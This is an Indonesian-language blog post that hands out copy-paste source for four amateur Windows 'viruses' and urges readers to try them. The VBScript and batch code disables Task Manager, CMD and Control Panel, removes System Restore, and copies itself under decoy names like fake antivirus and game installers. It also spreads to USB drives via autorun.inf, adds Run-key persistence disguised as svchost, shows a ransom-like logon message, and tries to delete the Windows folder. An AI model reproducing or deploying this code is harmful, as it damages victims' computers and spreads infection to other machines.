Gwa pnya beberpa scrip nya & skaligus nma virus nya. Ntr lo tinggal copy paste ja..

Caranya lo bka text document yg bru, trus copy paste ntr lo ganti nama ekstensi nya sesuai nama virus yg terdapat di atas scrip..!!!!!! met mencba ya Brow!!!!!!!!

@@@@ Ni virus nama nya (dazal.vbs) @@@@

On error resume next

Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner

set Regpen = CreateObject ("Wscript.Shell")

set FSO = CreateObject ("Scripting.FileSystemObject")

set Creator = FSO.CreateTextFile ("C:\Ternate.vbs", true)

Creator.WriteLine ("Msgbox ("& Chr (34) & "Salam Kenal dari Saya, Mr.Dajjal :<" & chr (34)& ")") Creator.Close Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\NoRun","1","REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr","1","RE G_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableCMD","1","REG_DW ORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOption","1"," REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDrives","16","REG_D WORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoSaveSettings","1"," REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoControlPanel","1"," REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\NoSetTaskbar","1","REG_DWORD" Regpen.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\HideFileExt" ,"1","REG_DWORD" Regpen.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption", "THE Syaithan-X" Regpen.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText","ASSALAMUALA IKUM, YA AHLIL KUBUR" Set Copier = FSO.GetFile ("C:\Ternate.vbs") Copier.Copy ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe.vbs") FSO.CreateFolder ("C:\Program Files\Microsoft 0ffice\0ffice12") FSO.CreateFolder ("D:\Program") FSO.CreateFolder ("E:\Program") FSO.CreateFolder ("F:\Program") FSO.CreateFolder ("G:\Program") FSO.CreateFolder ("H:\Program") FSO.CreateFolder ("I:\Program") FSO.CreateFolder ("J:\Program") FSO.CreateFolder ("K:\Program") Set Deleter = FSO.GetFile ("C:\Windows\System32\Restore\rstrui.exe") Deleter.Move ("C:\Program Files\Microsoft 0ffice\0ffice12\rstrui.Gnamu") set Dupler = FSO.GetFile (WScript.ScriptFullName) Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\Hantu.vbs") Dupler.Copy ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Desktop.ini.vbs") Dupler.Copy ("C:\Documents and Settings\All Users\Desktop\Dajjal_Antivirus.exe.vbs") Dupler.Copy ("C:\Windows\System32\Restore\rstrui.exe.vbs") Dupler.Copy ("D:\Program\MotoGP_SETUP.vbs") Dupler.Copy ("E:\Program\TuneUp2009_SETUP.vbs") Dupler.Copy ("F:\Program\Ansav_SETUP.vbs") Dupler.Copy ("G:\Program\DeltaForce_SETUP.vbs") Dupler.Copy ("H:\Program\DeltaForce_SETUP.vbs") Dupler.Copy ("I:\Program\Ansav_SETUP.vbs") Dupler.Copy ("J:\Program\Project.vbs") Dupler.Copy ("K:\Program\Hantu.vbs") Set Runner = WScript.CreateObject ("WScript.Shell") Runner.Run ("C:\Program Files\Microsoft 0ffice\0ffice12\Hantu.vbs")

@@@@ Ni virus nma nya (erwinda_putra.exe.vbs) @@@@

‘El Magnifico MAN

on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”

set fs = createobject(”Scripting.FileSystemObject”)

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

do

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)

tf.attributes = 32

set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)

tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then

set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)

tf.attributes =39

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes=39

end if

next

set rg = createobject(”WScript.Shell”)

rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”

rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"

rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3?

if check 1 then

Wscript.sleep 100000

end if

loop while check1

set sd = createobject(”Wscript.shell”)

sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2008

WScript.sleep 20000

msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _

“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _

“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _

“iko permainan yang paten ma dunsanak” & vbcrlf & _

vbcrlf & vbcrlf & _

” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _

” aaa kini saaiknyo ma dunsanak”

Loop

@@@@ Ni virus nama nya (jangkrik.bat) @@@@

@echo off

copy 8B5G0020.bmp %systemdrive%\ /y

copy 8B5G0020.bmp %systemdrive%\WINDOWS\ /y

copy 8B5G0020.bmp %systemdrive%\WINDOWS\system32\ /y

copy mmminstall.exe %systemdrive%\ /y

copy mmminstall.exe %systemdrive%\WINDOWS\ /y

copy mmminstall.exe %systemdrive%\WINDOWS\system32\ /y

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\8B5G0020.bmp /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f

reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\8B5G0020.bmp /f

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v itil /d %systemdrive%\windows\system32\mmminstall.exe /f

reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000 /f

@@@@ Ni virus nma nya (pembantai.cmd) @@@@

del C:/Windows

nah!!!!! Segitu ja dlu ya……. Ntr gwa up date trus ko tnang ja!!!!!!!!!....

eh tp ingt gwa gk bertnggung jwb apabla kmptr yg lo cba rsk……!!!!! Ok trims…

cara bikin anti virus di plashdisk

jangkrikvirus.com

Read Users' Comments (0)

Langganan: Postingan (Atom)